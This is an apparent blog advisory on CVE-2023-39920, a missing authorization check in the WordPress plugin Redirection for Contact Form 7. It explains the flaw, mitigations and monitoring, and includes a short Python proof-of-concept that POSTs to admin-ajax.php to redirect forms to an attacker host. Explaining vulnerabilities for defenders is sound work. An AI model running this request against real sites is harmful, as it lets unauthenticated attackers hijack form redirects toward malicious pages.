CVE-2023-39920 is a security vulnerability that affects the popular WordPress plugin Redirection for Contact Form 7 (versions up to 2.9.2). This issue results from missing authorization checks, allowing malicious actors to exploit incorrectly configured security levels and gain unauthorized access.
If you’re running WordPress forms and using this plugin, you need to understand how this vulnerability works, why it’s dangerous, and how to protect your site.
Vulnerability: Missing authorization (inadequate access control)
- Impact: Unauthenticated users can interact with plugin functionality reserved for admins or site editors
What is the Plugin and Who’s Affected?
Redirection for Contact Form 7 helps WordPress users redirect visitors after they submit a form (e.g., to a thank-you page or special offer). It’s widely used with the Contact Form 7 plugin for customizing user experience after form submission.
Who is at risk?
If you use this plugin on your WordPress site (especially a site that lets visitors submit forms), you are potentially at risk.
The Vulnerability Explained
The core problem is that some plugin features can be accessed *without* checking if the user is logged in or has appropriate permissions.
What Does That Mean?
The plugin registers AJAX hooks (functions for handling background requests to the server) without verifying if the user has permission—such as being an administrator. As a result, any unauthenticated attacker can send requests to these hooks and use the functions.
Technical Breakdown
Let’s look at an example piece of code that demonstrates the issue.
Suppose the plugin’s functions.php handles AJAX like this
add_action('wp_ajax_wpcf7r_save_redirect', 'wpcf7r_save_redirect');
// There should be another for non-logged in users:
add_action('wp_ajax_nopriv_wpcf7r_save_redirect', 'wpcf7r_save_redirect');
function wpcf7r_save_redirect() {
// Missing check: current_user_can('manage_options')
// Handles configuration of redirects
}
What’s missing?
There’s no check like this inside the function
if(!current_user_can('manage_options')){
wp_send_json_error("Unauthorized", 403);
exit;
}
Without permission checks, anyone can hit these endpoints—even if they’re not logged in.
How an Exploit Works
Attackers can craft a simple POST request to the plugin’s AJAX handler and change redirect settings, modify how forms work, or even inject malicious links.
Here’s a Python exploit example using requests
import requests
site = 'https://targetsite.com';
ajax_url = f"{site}/wp-admin/admin-ajax.php"
payload = {
'action': 'wpcf7r_save_redirect',
'redirect_url': 'https://badguy.com';,
'form_id': 1,
#... other required parameters...
}
r = requests.post(ajax_url, data=payload)
print(r.status_code)
print(r.text)
The attacker doesn’t need to be an admin or even a user—they’re just POSTing data as if they had authority.
Links to Original References
- WPScan Advisory
- NVD CVE-2023-39920
- Plugin repository
Deactivate if No Fix:
If no fix or update is available, deactivate or delete the Redirection for Contact Form 7 plugin.
Monitor Traffic:
Look for suspicious POST requests to /wp-admin/admin-ajax.php.
Conclusion
CVE-2023-39920 reminds us how critical it is to use plugins that respect proper security controls. Before deploying plugins, ensure they verify a user’s permissions for sensitive features.
For more info
- WPScan Advisory for Redirection for Contact Form 7
- CVE-2023-39920 in NVD
- Plugin Repo
Secure your website—update early, update often! If you’re vulnerable, act now.
Timeline
Published on: 12/13/2024 14:23:58 UTC